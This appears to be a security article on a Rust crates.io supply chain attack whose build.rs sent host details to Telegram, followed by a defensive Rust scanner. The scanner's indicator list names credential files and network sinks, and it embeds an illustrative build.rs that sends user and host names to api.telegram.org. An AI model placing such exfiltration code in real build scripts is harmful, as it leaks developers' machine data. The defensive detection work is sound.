Rust Malware Staged on Crates.io: A Threat to Rust Developers
The article reports a software supply chain attack against Rust developers that was caught and shut down early. It was staged on crates.io, the package registry for the Rust programming language. The attacker published several crates, beginning with an innocuous version that contained almost no code; later versions added a build.rs file. Cargo compiles and runs build.rs on the developer's machine as part of the build, with the developer's privileges and no sandbox, so the script executed whenever the crate was built, and it collected host information and sent it to a Telegram channel the attacker was monitoring. The same staging pattern (an empty placeholder first, then a payload that beacons host details out) is the usual prelude to credential stealers in other package ecosystems. The article reads the activity as early preparation for a broader campaign, with the attacker iterating toward a working compromise of developer machines. The Rust Foundation was notified promptly and measures were taken to stop the attack from continuing. The incident is a reminder that installing a dependency is code execution: Rust developers should review the build scripts of new or little-known crates before building them, pin and audit dependency versions, and keep up with security advisories for the crates they use.
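As an added example, not code from the article or from the reported crates, here is the kind of triage check a practitioner would want after reading this: a small audit that scans a crate's build.rs source for indicators of the described behaviour (host fingerprinting combined with an outbound channel, including the Telegram API endpoint). The indicator table is an assumed starting set, and both embedded build scripts are constructed for illustration; the suspicious one imitates what the article describes rather than reproducing the attacker's code, and it is only scanned as text, never compiled.

```rust
use std::collections::BTreeSet;

/// One indicator hit in a build script source, with the 1-based line it appears on.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Finding {
    pub category: &'static str,
    pub pattern: &'static str,
    pub line: usize,
}

/// Indicator table. This is an assumed starting set for illustration, not an
/// exhaustive signature list; a determined attacker can obfuscate around it.
const INDICATORS: &[(&str, &[&str])] = &[
    // A build script has no legitimate reason to open network connections.
    ("network", &["std::net", "TcpStream", "UdpSocket", "reqwest", "ureq"]),
    // The sink named in the article: a Telegram bot API endpoint.
    ("exfil-endpoint", &["api.telegram.org", "/sendMessage"]),
    // Host fingerprinting: user and host names, or a dump of the environment.
    ("host-fingerprint", &["env::vars(", "HOSTNAME", "USERNAME", "env::var(\"USER\"", "hostname", "whoami"]),
    // Spawning shells or pulling a second stage from a build script.
    ("process-spawn", &["process::Command", "Command::new("]),
    // Files a build script should never read.
    ("credential-file", &[".ssh", ".aws/credentials", "credentials.toml"]),
];

/// Scan build.rs source line by line and return every indicator hit.
/// `//` comments are skipped because they cannot execute (block comments are not handled).
pub fn audit_build_script(src: &str) -> Vec<Finding> {
    let mut findings = Vec::new();
    for (idx, line) in src.lines().enumerate() {
        if line.trim_start().starts_with("//") {
            continue;
        }
        for &(category, patterns) in INDICATORS {
            for &pattern in patterns {
                if line.contains(pattern) {
                    findings.push(Finding { category, pattern, line: idx + 1 });
                }
            }
        }
    }
    findings
}

/// Collapse findings into a verdict. Fingerprinting plus an outbound channel is
/// exactly the beaconing pattern the article describes.
pub fn classify(findings: &[Finding]) -> &'static str {
    let cats: BTreeSet<&str> = findings.iter().map(|f| f.category).collect();
    let talks_out = cats.contains("network") || cats.contains("exfil-endpoint");
    let fingerprints = cats.contains("host-fingerprint") || cats.contains("credential-file");
    if talks_out && fingerprints {
        "exfiltration-pattern"
    } else if cats.is_empty() {
        "clean"
    } else {
        "suspicious"
    }
}

/// Constructed benign build.rs: only emits cargo directives.
pub const BENIGN_BUILD_RS: &str = r#"
fn main() {
    println!("cargo:rerun-if-changed=build.rs");
    println!("cargo:rustc-cfg=has_feature_x");
}
"#;

/// Constructed sample imitating the behaviour the article describes (not the
/// attacker's code): read user and host names, then push them to Telegram at
/// build time. It is scanned as text only and never compiled or executed here.
pub const SUSPICIOUS_BUILD_RS: &str = r#"
use std::env;
use std::net::TcpStream;
use std::io::Write;
fn main() {
    let user = env::var("USER").unwrap_or_default();
    let host = env::var("HOSTNAME").unwrap_or_default();
    let body = format!("chat_id=0&text={}@{}", user, host);
    if let Ok(mut s) = TcpStream::connect("api.telegram.org:443") {
        let _ = s.write_all(body.as_bytes());
    }
}
"#;

fn main() {
    for &(name, src) in &[("benign", BENIGN_BUILD_RS), ("suspicious", SUSPICIOUS_BUILD_RS)] {
        let findings = audit_build_script(src);
        println!("{}: {}", name, classify(&findings));
        for f in &findings {
            println!("  line {:>2}: [{}] {}", f.line, f.category, f.pattern);
        }
    }
}
```

To use this on a real dependency without running its build script, download first and build later: `cargo fetch` only populates the registry cache, and the extracted sources to scan live under `~/.cargo/registry/src/`; `cargo build` and `cargo check` both execute build.rs. Plain substring matching is a triage aid, not a verdict: an attacker can split or encode the strings, so a hit deserves a manual read of the script and a miss is not a clean bill of health.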